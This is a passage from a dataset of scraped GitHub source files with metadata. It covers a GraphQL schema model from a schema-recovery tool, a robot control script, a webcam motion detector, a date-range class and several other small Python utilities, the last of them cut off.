"usage_ty... |
40126491559 | import json
from typing import Any, Dict, List, Optional, Set
from clairvoyance.entities import GraphQLPrimitive
from clairvoyance.entities.context import log
from clairvoyance.entities.primitives import GraphQLKind
class Schema:
"""Host of the introspection data."""
def __init__(
self,
query_type: str = None,
mutation_type: str = None,
subscription_type: str = None,
schema: Dict[str, Any] = None,
):
if schema:
self._schema = {
'directives': schema['data']['__schema']['directives'],
'mutationType': schema['data']['__schema']['mutationType'],
'queryType': schema['data']['__schema']['queryType'],
'subscriptionType': schema['data']['__schema']['subscriptionType'],
'types': [],
}
self.types = {}
for t in schema['data']['__schema']['types']:
typ = Type.from_json(t)
self.types[typ.name] = typ
else:
self.query_type = {'name': query_type} if query_type else None
self.mutation_type = {'name': mutation_type} if mutation_type else None
self.subscription_type = ({'name': subscription_type} if subscription_type else None)
self._schema = {
'directives': [],
'queryType': self.query_type,
'mutationType': self.mutation_type,
'subscriptionType': self.subscription_type,
'types': [],
}
self.types = {
GraphQLPrimitive.STRING: Type(
name=GraphQLPrimitive.STRING,
kind=GraphQLKind.SCALAR,
),
GraphQLPrimitive.ID: Type(
name=GraphQLPrimitive.ID,
kind=GraphQLKind.SCALAR,
),
}
if query_type:
self.add_type(query_type, 'OBJECT')
if mutation_type:
self.add_type(mutation_type, 'OBJECT')
if subscription_type:
self.add_type(subscription_type, 'OBJECT')
# Adds type to schema if it's not exists already
def add_type(
self,
name: str,
kind: str,
) -> None:
"""Adds type to schema if it's not exists already."""
if name not in self.types:
typ = Type(name=name, kind=kind)
self.types[name] = typ
def __repr__(self) -> str:
"""String representation of the schema."""
schema = {'data': {'__schema': self._schema}}
for t in self.types.values():
schema['data']['__schema']['types'].append(t.to_json())
output = json.dumps(schema, indent=4, sort_keys=True)
return output
def get_path_from_root(
self,
name: str,
) -> List[str]:
"""Getting path starting from root.
The algorigthm explores the schema in a DFS manner. It uses a set to keep track of visited nodes, and a list to keep track of the path. Keeping track of
the visited nodes is necessary to avoid infinite loops (ie. recursions in the schema). If a full iteration over the types is made without finding a
match, it means that the schema is not connected, and the path cannot be found.
"""
log().debug(f'Entered get_path_from_root({name})')
path_from_root: List[str] = []
if name not in self.types:
raise Exception(f'Type \'{name}\' not in schema!')
roots = [
self._schema['queryType']['name'] if self._schema['queryType'] else '',
self._schema['mutationType']['name'] if self._schema['mutationType'] else '',
self._schema['subscriptionType']['name'] if self._schema['subscriptionType'] else '',
]
roots = [r for r in roots if r]
visited = set()
initial_name = name
while name not in roots:
found = False
for t in self.types.values():
for f in t.fields:
key = f'{t.name}.{f.name}'
if key in visited:
continue
if f.type.name == name:
path_from_root.insert(0, f.name)
visited.add(key)
name = t.name
found = True
if not found:
log().debug('get_path_from_root: Ran an iteration with no matches found')
raise Exception(f'Could not find path from root to \'{initial_name}\' \nCurrent path: {path_from_root}')
# Prepend queryType or mutationType
path_from_root.insert(0, name)
return path_from_root
def get_type_without_fields(
self,
ignored: Set[str] = None,
) -> str:
"""Gets the type without a field."""
ignored = ignored or set()
for t in self.types.values():
if not t.fields and t.name not in ignored and t.kind != GraphQLKind.INPUT_OBJECT:
return t.name
return ''
def convert_path_to_document(
self,
path: List[str],
) -> str:
"""Converts a path to document."""
log().debug(f'Entered convert_path_to_document({path})')
doc = 'FUZZ'
while len(path) > 1:
doc = f'{path.pop()} {{ {doc} }}'
if self._schema['queryType'] and path[0] == self._schema['queryType']['name']:
doc = f'query {{ {doc} }}'
elif self._schema['mutationType'] and path[0] == self._schema['mutationType']['name']:
doc = f'mutation {{ {doc} }}'
elif self._schema['subscriptionType'] and path[0] == self._schema['subscriptionType']['name']:
doc = f'subscription {{ {doc} }}'
else:
raise Exception('Unknown operation type')
return doc
class TypeRef:
def __init__(
self,
name: str,
kind: str,
is_list: bool = False,
non_null_item: bool = False,
non_null: bool = False,
) -> None:
if not is_list and non_null_item:
raise Exception('elements can\'t be NON_NULL if TypeRef is not LIST')
self.name = name
self.kind = kind
self.is_list = is_list
self.non_null = non_null
self.list = self.is_list
self.non_null_item = non_null_item
def __eq__(self, other: Any) -> bool:
if isinstance(other, TypeRef):
for key, attr in self.__dict__.items():
if attr != other.__dict__[key]:
return False
return True
return False
def __str__(self) -> str:
return str(self.__dict__)
def to_json(self) -> Dict[str, Any]:
j: Dict[str, Any] = {'kind': self.kind, 'name': self.name, 'ofType': None}
if self.non_null_item:
j = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': j}
if self.list:
j = {'kind': GraphQLKind.LIST, 'name': None, 'ofType': j}
if self.non_null:
j = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': j}
return j
class InputValue:
def __init__(
self,
name: str,
typ: TypeRef,
) -> None:
self.name = name
self.type = typ
def __str__(self) -> str:
return f'{{ \'name\': {self.name}, \'type\': {str(self.type)} }}'
def to_json(self) -> dict:
return {
'defaultValue': None,
'description': None,
'name': self.name,
'type': self.type.to_json(),
}
@classmethod
def from_json(
cls,
_json: Dict[str, Any],
) -> 'InputValue':
name = _json['name']
typ = field_or_arg_type_from_json(_json['type'])
return cls(
name=name,
typ=typ,
)
def field_or_arg_type_from_json(_json: Dict[str, Any]) -> 'TypeRef':
typ = None
if _json['kind'] not in [GraphQLKind.NON_NULL, GraphQLKind.LIST]:
typ = TypeRef(
name=_json['name'],
kind=_json['kind'],
)
elif not _json['ofType']['ofType']:
actual_type = _json['ofType']
if _json['kind'] == GraphQLKind.NON_NULL:
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
non_null=True,
)
elif _json['kind'] == GraphQLKind.LIST:
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
is_list=True,
)
else:
raise Exception(f'Unexpected type.kind: {_json["kind"]}')
elif not _json['ofType']['ofType']['ofType']:
actual_type = _json['ofType']['ofType']
if _json['kind'] == GraphQLKind.NON_NULL:
typ = TypeRef(
actual_type['name'],
actual_type['kind'],
True,
False,
True,
)
elif _json['kind'] == GraphQLKind.LIST:
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
is_list=True,
non_null_item=True,
)
else:
raise Exception(f'Unexpected type.kind: {_json["kind"]}')
elif not _json['ofType']['ofType']['ofType']['ofType']:
actual_type = _json['ofType']['ofType']['ofType']
typ = TypeRef(
name=actual_type['name'],
kind=actual_type['kind'],
is_list=True,
non_null_item=True,
non_null=True,
)
else:
raise Exception('Invalid field or arg (too many \'ofType\')')
return typ
class Field:
def __init__(
self,
name: str,
typeref: Optional[TypeRef],
args: List[InputValue] = None,
):
if not typeref:
raise Exception(f'Can\'t create {name} Field from {typeref} TypeRef.')
self.name = name
self.type = typeref
self.args = args or []
def to_json(self) -> dict:
return {
'args': [a.to_json() for a in self.args],
'deprecationReason': None,
'description': None,
'isDeprecated': False,
'name': self.name,
'type': self.type.to_json(),
}
@classmethod
def from_json(cls, _json: Dict[str, Any]) -> 'Field':
name = _json['name']
typ = field_or_arg_type_from_json(_json['type'])
args = []
for a in _json['args']:
args.append(InputValue.from_json(a))
return cls(name, typ, args)
class Type:
def __init__(
self,
name: str = '',
kind: str = '',
fields: List[Field] = None,
):
self.name = name
self.kind = kind
self.fields: List[Field] = fields or []
def to_json(self) -> Dict[str, Any]:
# dirty hack
if not self.fields:
field_typeref = TypeRef(
name=GraphQLPrimitive.STRING,
kind=GraphQLKind.SCALAR,
)
dummy = Field('dummy', field_typeref)
self.fields.append(dummy)
output: Dict[str, Any] = {
'description': None,
'enumValues': None,
'interfaces': [],
'kind': self.kind,
'name': self.name,
'possibleTypes': None,
}
if self.kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
output['fields'] = [f.to_json() for f in self.fields]
output['inputFields'] = None
elif self.kind == GraphQLKind.INPUT_OBJECT:
output['fields'] = None
output['inputFields'] = [f.to_json() for f in self.fields]
return output
@classmethod
def from_json(
cls,
_json: Dict[str, Any],
) -> 'Type':
name = _json['name']
kind = _json['kind']
fields = []
if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE, GraphQLKind.INPUT_OBJECT]:
fields_field = ''
if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
fields_field = 'fields'
elif kind == GraphQLKind.INPUT_OBJECT:
fields_field = 'inputFields'
for f in _json[fields_field]:
# Don't add dummy fields!
if f['name'] == 'dummy':
continue
fields.append(Field.from_json(f))
return cls(
name=name,
kind=kind,
fields=fields,
)
| nikitastupin/clairvoyance | clairvoyance/graphql.py | graphql.py | py | 12,718 | python | en | code | 785 | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "clairvoyance.entities.GraphQLPrimitive.STRING",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_nam... |
6215124822 | from rodi import RoDI
import time
robot = RoDI()
def reubicar():
robot.move_stop()
robot.pixel(20,0,0)
robot.move_backward()
time.sleep(0.1)
robot.move_left()
time.sleep(0.5)
robot.move_forward()
time.sleep(0.5)
def ataque():
robot.move(100,100)
while True:
try:
distancia = robot.see()
linea = robot.sense()
robot.pixel(20,20,20)
robot.move(30,30)
time.sleep(0.1)
inicio_de_ataque = None
print("Distancia: " + str(distancia))
print("Linea 1: " + str(linea[0]))
print("Linea 2: " + str(linea[1]))
if (linea[0] >= 100 or linea[1] >= 100):
reubicar()
if distancia < 15:
ataque()
inicio_de_ataque = time.time()
if time.time() - inicio_de_ataque > 2:
reubicar()
except KeyboardInterrupt:
robot.move_stop()
break
| devpbeat/bootcamp | rob.py | rob.py | py | 921 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "rodi.RoDI",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 14,
... |
9036950970 | from datetime import datetime
from sqlalchemy import Column, String, Integer, Float, DateTime, select, delete
from sqlalchemy.exc import IntegrityError, NoResultFound
from sqlalchemy.ext.asyncio import AsyncSession
from app.services.database import Base
class TokenInfo(Base):
__tablename__ = "TokenInfo"
created_at = Column(DateTime, primary_key=True)
symbol = Column(String, primary_key=True)
rank = Column(Integer, nullable=False)
price = Column(Float, nullable=True)
@classmethod
async def create(cls, db: AsyncSession, **kwargs):
transaction = cls(**kwargs)
db.add(transaction)
await db.commit()
await db.refresh(transaction)
return transaction
@classmethod
async def delete_timestamp(cls, db: AsyncSession, created_at: datetime):
transaction = delete(cls).where(
cls.created_at==created_at
).returning(cls.symbol, cls.created_at)
await db.execute(transaction)
await db.commit()
return transaction
@classmethod
async def get_tokens_by_date(cls, db: AsyncSession, dt: datetime):
return (await db.execute(
select(cls).filter_by(created_at=dt)
)).scalars().all()
| treybrooks/TopCryptosAPI | api/app/models.py | models.py | py | 1,243 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "app.services.database.Base",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.DateTime",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "s... |
1522352511 | import cv2, time, pandas
from datetime import datetime
firstFrame = None
statusList = [None, None]
times = []
contourCount = []
frameCount = []
avgContour = []
contCStart = 0 #indicator to start recording contour area
video = cv2.VideoCapture(0, cv2.CAP_DSHOW)
df = pandas.DataFrame(columns=["Start","End"])
while True:
check, frame = video.read()
status = 0
# turning gray
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (21,21), 0)
#catch first frame for later comparisons
if firstFrame is None:
firstFrame = gray
continue
delta = cv2.absdiff(firstFrame, gray)
#finding areas of movement and turning them to black/white
# then finding contours for the movement
threshFrame = cv2.threshold(delta, 30, 255, cv2.THRESH_BINARY)[1]
threshFrame = cv2.dilate(threshFrame, None, iterations=2)
(cnts,_) = cv2.findContours(threshFrame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#if contour area >5000 put a rectangle around it and excecute rest
for contour in cnts:
if cv2.contourArea(contour) < 5000:
if contCStart == 1: #if first movement already detected
contourCount.append(0)
continue
status = 1
contCStart = 1
contourCount.append(cv2.contourArea(contour))
(x, y, w, h) = cv2.boundingRect(contour)
cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255,0), 3)
statusList.append(status)
statusList = statusList[-2:] #only keep track of part of list we need
#record time something exits/enters frame, and size on exit
if statusList[-1] == 1 and statusList[-2] == 0:
times.append(datetime.now())
if statusList[-1] == 0 and statusList[-2] == 1:
times.append(datetime.now())
times.append(cv2.contourArea(contour))
#showing gray, delta, black/white, and rectangle on orig
cv2.imshow("Capturing", gray)
cv2.imshow("Delta", delta)
cv2.imshow("Threshold", threshFrame)
cv2.imshow("Color Frame", frame)
key = cv2.waitKey(100)
if key == ord('q'):
if status == 1:
times.append(datetime.now())
times.append(cv2.contourArea(contour))
break
################# end while loop ###############
#add times to data frame
for i in range(0, len(times), 3):
df = df.append({"Start":times[i], "End":times[i+1], "ExitArea":times[i+2]}, ignore_index=True)
df.to_csv("Times.csv")
z = 0
x = 0
y = 0
count = 1
# averaging contours together to smooth graph
while x < len(contourCount):
while z < x+10:
if z < len(contourCount):
y = contourCount[z] + y
z = z + 1
count = count + 1
else:
z = x + 50
avgContour.append(float(int(y/count)^2)) #squared to accentuate changes
#avgContour.append((y/count))
y = 0
x = x + 10
z = z + 1
count = 1
i = 0
# count for x-axis on plot
while i < len(avgContour):
frameCount.append(i)
i = i + 1
video.release()
cv2.destroyAllWindows()
| Caseyar95/MotionDetectingWebcam | VideoCapture2.py | VideoCapture2.py | py | 3,169 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.CAP_DSHOW",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
... |
5145048204 | from .range_borders import Date, FromInfinity, ToInfinity
from datetime import timedelta
class DateRange:
"""
This class implements date ranges that support open borders,
so it is possible to create date ranges that contain all dates up to
a specific date or all dates from a specific date on. Strict ranges with
specific dates as borders are supported as well.
The implementation does not support any kind of daytime measurement.
"""
# DateRange supports all formats that are supported by the datetime module
# '%Y-%m-%d' is the predefined format
DATE_FORMAT: str = '%Y-%m-%d'
#######################################################################################
# the following methods can be called on every DateRange instance (infinite and finite)
def __init__(self, date_from: str or None, date_to: str or None):
"""
Creates a new Daterange. date_to must be greater or equal to date_form
:param date_from: None value represents an open border
:param date_to: None value represents an open border
"""
if date_from is None:
self._date_from = FromInfinity()
else:
self._date_from = Date(date_from, DateRange.DATE_FORMAT)
if date_to is None:
self._date_to = ToInfinity()
else:
self._date_to = Date(date_to, DateRange.DATE_FORMAT)
# is set in the first call of the __len__ function
self._length = None
self._is_infinite = date_from is None or date_to is None
if not self._is_infinite:
if date_to < date_from:
raise ValueError(f"date_to must be equal or greater than date_form. "
f"{self.__repr__()}")
def __repr__(self):
return f"DateRange({self._date_from.to_string(DateRange.DATE_FORMAT)}, " \
f"{self._date_to.to_string(DateRange.DATE_FORMAT)})"
def __contains__(self, item: str):
date = Date(item, DateRange.DATE_FORMAT)
return self._date_from <= date <= self._date_to
def intersects(self, date_from: str or None, date_to: str or None) -> bool:
# returns true if at least one date is contained in both ranges
date_range = DateRange(date_from=date_from, date_to=date_to)
return not (self._date_to < date_range._date_from or date_range._date_to < self._date_from)
def is_infinite(self) -> bool:
return self._is_infinite
##########################################################################
# the following methods raise exceptions if called on infinite DateRanges
def __iter__(self):
if self._is_infinite:
raise ValueError(f"infinite date ranges are not iterable. date_range: {self.__repr__()}")
else:
self._current = self._date_from.date
return self
def __next__(self):
if self._current > self._date_to.date:
raise StopIteration
else:
ret = self._current.strftime(DateRange.DATE_FORMAT)
self._current += timedelta(1)
return ret
def __len__(self):
if self._is_infinite:
raise ValueError(f"length infinite date ranges is not defined. date_range: {self.__repr__()}")
# length has to be calculated and set only once because the
# length of a date range can not change
# !!!---if you want to implement the borders of date ranges to be changeable
# this method must be reimplemented---!!!
if self._length is None:
counter = 0
# __iter__ can safely be used because __len__ requires a finite date range as well
for _ in self.__iter__():
counter += 1
self._length = counter
return self._length
| tlie03/OpenDateRange | src/openDateRange/date_range.py | date_range.py | py | 3,833 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "range_borders.FromInfinity",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "range_borders.Date",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "range_borders.ToInfinity",
"line_number": 32,
"usage_type": "call"
},
{
"api_name":... |
6790838721 | from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericRelation
from model_utils.models import TimeStampedModel
from files.mixins import UploadedFileMixin
from permissions.models import PermissionManagerMixin
from utils.models import CreatedByMixin
from utils.models.slug_field import AutoSlugCustomManagerField
from utils.descriptors import ChoicesDescriptorMixin
from ..managers.post import PostManager, AllPostManager
from ..conf import settings
from .mails.mails import PostEmailMixin
from .mixins import PostStatsMixin, PostPermissionsMixin, PostMetricMixin
class Post(
PostPermissionsMixin,
PostMetricMixin,
PostStatsMixin,
UploadedFileMixin,
PermissionManagerMixin,
CreatedByMixin,
ChoicesDescriptorMixin,
PostEmailMixin,
TimeStampedModel):
# Define here because of AutoSlugField
objects = PostManager()
all_objects = AllPostManager()
title = models.CharField(max_length=255)
description = models.TextField()
content_type = models.ForeignKey(
ContentType,
on_delete=models.CASCADE,
null=True,
)
object_id = models.PositiveIntegerField(null=True)
content_object = GenericForeignKey('content_type', 'object_id')
slug = AutoSlugCustomManagerField(
populate_from='title',
unique=True,
null=True,
blank=False,
)
tags = models.ManyToManyField('keywords.Keyword')
_type = models.CharField(
max_length=1,
choices=settings.FORUM_POST_CH_TYPE)
status = models.CharField(
max_length=1,
choices=settings.FORUM_CH_POST_STATUS,
default=settings.FORUM_CH_POST_STATUS_DEFAULT)
CHOICES_DESCRIPTOR_FIELDS = [
'_type',
'status',
]
CHOICES_DESCRIPTOR_FIELDS_CHOICES = [
settings.FORUM_POST_CH_TYPE,
settings.FORUM_CH_POST_STATUS,
]
logs = GenericRelation('PostAnswerStatus')
files = GenericRelation('files.UploadedFile')
objects = PostManager()
all_objects = AllPostManager()
slug_manager = AllPostManager()
class Meta:
verbose_name = 'Post'
verbose_name_plural = 'Posts'
ordering = ['-modified']
base_manager_name = 'objects'
permissions = settings.FORUM_PERMS_POST_ALL_PERMISSIONS
def __str__(self):
return self.title
@property
def category_name(self):
category_name = ''
if self.is_q_a_session:
category_name = '{} - {} - {}'.format(
self.get__type_display(),
self.content_object.team.project,
self.content_object.session.name,
)
elif self.content_object:
category_name = self.content_object.name
else:
category_name = self.get__type_display()
return category_name
@property
def circle(self):
if self.is_circle:
return self.content_object
return None
@property
def qa_session(self):
if self.is_q_a_session:
return self.content_object.session
return None
@property
def team(self):
if self.is_project:
return self.content_object
elif self.is_q_a_session:
return self.content_object.team
return None
@property
def project(self):
if self.team:
return self.team.project
return None
@property
def created_by_role(self):
return self.created_by.user_title
@property
def url(self):
if self.is_circle or self.is_project or self.is_announcement:
if self.is_circle:
circle = self.circle.slug
elif self.is_project:
circle = 'participant-questions'
else:
circle = 'announcements'
return settings.FRONTEND_POST_DETAIL_PAGE.format(
slug=self.slug,
circle=circle)
elif self.is_q_a_session:
return settings.FRONTEND_JOBS_SWARM_SESSION_QUESTION_PAGE.format(
**{
'pk_qa_session': self.content_object.session.pk,
'pk': self.pk
})
else:
return ''
@property
def url_project(self):
kwargs = {}
if self.project is not None:
kwargs = {
'project_id': self.project.pk,
'team_id': self.team.pk,
'pk': self.pk,
}
if self.is_project:
kwargs['section'] = 'ask-ecosystem'
elif self.is_q_a_session:
kwargs['section'] = 'swarm-session'
else:
kwargs = None
if kwargs is not None:
return settings.FRONTEND_PROJECT_QUESTION_PAGE.format(**kwargs)
return ''
def set_status(self, user_from, new_status):
self.logs.create(
user=user_from, status=self.status)
self.status = new_status
self.save(update_fields=['modified', 'status'])
def mark_as_removed(self, user_from):
self.can_update_or_remove(user_from)
self.set_status(user_from, settings.FORUM_CH_REMOVED)
self.action_removed(user_from)
def reply(self, user_from, comment, timestamp=None, **kwargs):
self.can_reply(user_from)
answer = self.answers.create(
comment=comment,
created_by=user_from,
reply_to=kwargs.get('reply_to'),
)
kwargs['target_object'] = answer
if timestamp:
self.answers.filter(pk=answer.pk).update(
created=timestamp,
modified=timestamp)
Post.objects.filter(pk=self.pk).update(modified=timestamp)
else:
self.save(update_fields=['modified'])
if kwargs.get('email_notification', True):
self.send_email_reply(answer)
answer.see(user_from)
super().reply(user_from, comment, timestamp, **kwargs)
return answer
| tomasgarzon/exo-services | service-exo-core/forum/models/post.py | post.py | py | 6,189 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mixins.PostPermissionsMixin",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mixins.PostMetricMixin",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "mixins.PostStatsMixin",
"line_number": 24,
"usage_type": "name"
},
{
"api_name... |
11538242087 | from PIL import Image, ImageDraw
cella = 75
def rect(x1, y1, x2, y2, col):
dib.polygon([(x1, y1), (x2, y1), (x2, y2), (x1, y2)], col)
def cercle(x, y, col):
dib.ellipse([cella*x + 25, cella*y + 25, cella*x + 49, cella*y + 49], col)
c = int(input())
f = int(input())
img = Image.new('RGB', (cella*c, cella*f), 'Beige')
dib = ImageDraw.Draw(img)
mat = []
for j in range(f):
fila = [0]*c
mat += [fila]
mat[0][0] = 1
cercle(0, 0, 'Black')
mat[f-1][c-1] = 1
cercle(c - 1, f - 1, 'Black')
n = int(input())
for r in range(n):
x = int(input()) - 1
y = int(input()) - 1
mat[y][x] = 1
cercle(x, y, 'Black')
x = 0
y = 0
color = ''
while color == '':
if x == c - 1 and y == f - 1:
color = 'Green'
elif x < c - 1 and mat[y][x+1]:
x += 1
elif y < f - 1 and mat[y+1][x]:
y += 1
else:
color = 'Red'
x = 0
y = 0
fi = False
while not fi:
cercle(x, y, color)
if x == c - 1 and y == f - 1:
fi = True
elif x < c - 1 and mat[y][x+1]:
rect(cella*x + cella//2, cella*y + 35, cella*x + 3*cella//2, cella*y + 39, color)
x += 1
elif y < f - 1 and mat[y+1][x]:
rect(cella*x + 35, cella*y + cella//2, cella*x + 39, cella*y + 3*cella//2, color)
y += 1
else:
fi = True
img.save("output.png") | oicatalana/solucions_oicat_2019 | concurs_classificatori2/pb6.py | pb6.py | py | 1,255 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "PIL.Image.new",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "PIL.ImageDraw.Draw",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PIL.ImageDraw",
"line_... |
18180968433 | # Student Virtual Assistant
# Libraries for accessing Google Scholar and scheduling reminders
import webbrowser
import schedule
import time
# Function to access Google Scholar
def search_scholar(query):
webbrowser.open(f"https://scholar.google.com/scholar?q={query}")
# Function to input schedule
def input_schedule():
schedule = {}
while True:
class_name = input("Enter class name (or type 'done' if finished): ")
if class_name == "done":
break
class_time = input("Enter class time (e.g. 9:00 AM): ")
schedule[class_name] = class_time
return schedule
# Function to input assignments
def input_assignments():
assignments = []
while True:
assignment = input("Enter assignment (or type 'done' if finished): ")
if assignment == "done":
break
assignments.append(assignment)
return assignments
# Function to remind student to hydrate
def remind_hydrate():
print("Don't forget to drink water and stay hydrated!")
# Main function to run the virtual assistant
def run_assistant():
print("Welcome to the Student Virtual Assistant")
# Input schedule
print("Please enter your schedule:")
schedule = input_schedule()
print(f"Your schedule: {schedule}")
# Input assignments
print("Please enter your assignments:")
assignments = input_assignments()
print(f"Your assignments: {assignments}")
# Access Google Scholar
query = input("What would you like to search on Google Scholar? ")
search_scholar(query)
# Schedule reminders to hydrate
schedule.every(1).hours.do(remind_hydrate)
# Start reminders
while True:
schedule.run_pending()
time.sleep(1)
# Run the virtual assistant
if __name__ == "__main__":
run_assistant()
| macnya/Student_virtual_assistant | Student_VA.py | Student_VA.py | py | 1,790 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "webbrowser.open",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "schedule.every",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "schedule.run_pending",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "time.sleep",
... |
37241864515 | #!/usr/bin/python3
"""
Run this with:
python3 -m http.server --cgi
"""
import cgitb
cgitb.enable(format="text")
from helper import get_input, json
# user_input = get_input()
test_data = {
"firstName": "John",
"lastName": "Smith",
"age": 27
}
# Will give you JSON output in the console
print(json.dumps(test_data))
'''
if user_input:
print("User-input", user_input)
else:
print(test_data)
''' | Alexico1969/Points-Sandbox | cgi-bin/api.py | api.py | py | 415 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cgitb.enable",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "helper.json.dumps",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "helper.json",
"line_number": 23,
"usage_type": "name"
}
] |
72084597543 | from setuptools import setup, find_packages
with open("requirements.txt") as f:
content = f.readlines()
requirements = [x.strip() for x in content if "git+" not in x]
setup(name='chord-cleaning',
description='creating a set of standardized chords from data',
install_requires=requirements,
packages=find_packages(),)
| emilycardwell/chord-cleaning | setup.py | setup.py | py | 341 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 10,
"usage_type": "call"
}
] |
8265346084 | import csv
import os
import sys
from typing import List
from termcolor import colored
from tqdm import tqdm
from .binaryds import BinaryDs
MINIMUM_FEATURES: int = 32
csv.field_size_limit(sys.maxsize)
def run_preprocess(input_dir: List[str], category: int, output_dir: str,
openc: bool, features: int, balanced: bool,
seed: int, incomplete: bool) -> None:
"""
Performs the preprocessing by adding a category and writes (or updates) the
binary file containing the dataset on disk
:param input_dir The folder where the examples for a single category can be
found
:param category: The id of the category that will be written
:param output_dir: Path to the folder where the train.bin and test.bin
can be found (or will be created).
:param openc: True if this method has a function opcode encoding
:param features: How many features (i.e. The number of bytes for each
example)
:param balanced: True if the produced dataset should have the same
amount of training/testing/validate samples for each category
:param seed: The seed that will be used for shuffling
:param incomplete: True if the dataset won't be splitted, deduplicated
or shuffled
"""
assert (os.path.exists(output_dir))
train, validate, test = __load_all_into_train(output_dir, features, openc)
print("Reading and adding new files... ", flush=True)
files = gather_files(input_dir, openc)
read_and_add(train, files, category)
if incomplete:
print("Deduplicating... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Shuffling... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Balancing... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Splitting... ", end="", flush=True)
print(colored("SKIP", "white", attrs=['bold']), flush=True)
else:
print("Deduplicating... ", end="", flush=True)
train.deduplicate()
print(colored("OK", "green", attrs=['bold']), flush=True)
print("Shuffling... ", end="", flush=True)
train.shuffle(seed)
print(colored("OK", "green", attrs=['bold']), flush=True)
print("Balancing... ", end="", flush=True)
if balanced:
train.balance()
print(colored("OK", "green", attrs=['bold']), flush=True)
else:
print(colored("SKIP", "white", attrs=['bold']), flush=True)
print("Splitting... ", end="", flush=True)
train.split(validate, 0.5)
validate.split(test, 0.5)
print(colored("OK", "green", attrs=['bold']), flush=True)
print("Finalizing... ", end="", flush=True)
train.close()
validate.close()
test.close()
print(colored("OK", "green", attrs=['bold']), flush=True)
def __load_all_into_train(output_dir: str, features: int,
openc: bool) -> (BinaryDs, BinaryDs, BinaryDs):
# Load all the files into the train dataset
print("Loading old dataset... ", end="", flush=True)
path_train = os.path.join(output_dir, "train.bin")
path_val = os.path.join(output_dir, "validate.bin")
path_test = os.path.join(output_dir, "test.bin")
train = BinaryDs(path_train, features=features, encoded=openc).open()
test = BinaryDs(path_test, features=features, encoded=openc).open()
validate = BinaryDs(path_val, features=features, encoded=openc).open()
train.merge(test)
train.merge(validate)
print(colored("OK", "green", attrs=['bold']), flush=True)
return train, validate, test
def read_and_add(dataset: BinaryDs, files: List[str], category: int) -> None:
"""
Reads the raw files add them directly to the dataset as examples.
Functions/data with more bytes than the number of features will be split
into several chunks of features length.
If opcode encoding was chosen, chunks with less than MINIMUM_FEATURES bytes
(default 32) will be discarded, otherwise chunks with an amount of bytes
different than the number of features will be discarded.
:param files: List of paths to every file that will be processed.
:param dataset: dataset where the examples will be added.
:param category: The category for the current examples.
"""
buffer = []
for cur_file in tqdm(files, ncols=60):
data = list()
features = dataset.get_features()
openc = dataset.is_encoded()
if openc:
with open(cur_file, 'r') as f:
reader = csv.DictReader(f, delimiter=",", quotechar='"',
quoting=csv.QUOTE_NONNUMERIC)
for row in reader:
raw_data = row["opcodes"]
encoded_data = bytes.fromhex(raw_data)
data.append(encoded_data)
else:
with open(cur_file, 'rb') as f:
data.append(f.read())
# split in chunks of "features" length
chunked = []
for el in data:
chunks = [el[j:j + features] for j in range(0, len(el), features)]
chunked.extend(chunks)
if openc:
# prepad remaining elements and drop ones that are too short
padded = []
for element in chunked:
cur_len = len(element)
if cur_len >= MINIMUM_FEATURES:
missing = features - cur_len
padded.append(bytes(missing) + element)
chunked = padded
else:
# drop elements different from feature size
chunked = list(filter(lambda l: len(l) == features, chunked))
# append category and add to dataset
chunked = [(category, x) for x in chunked]
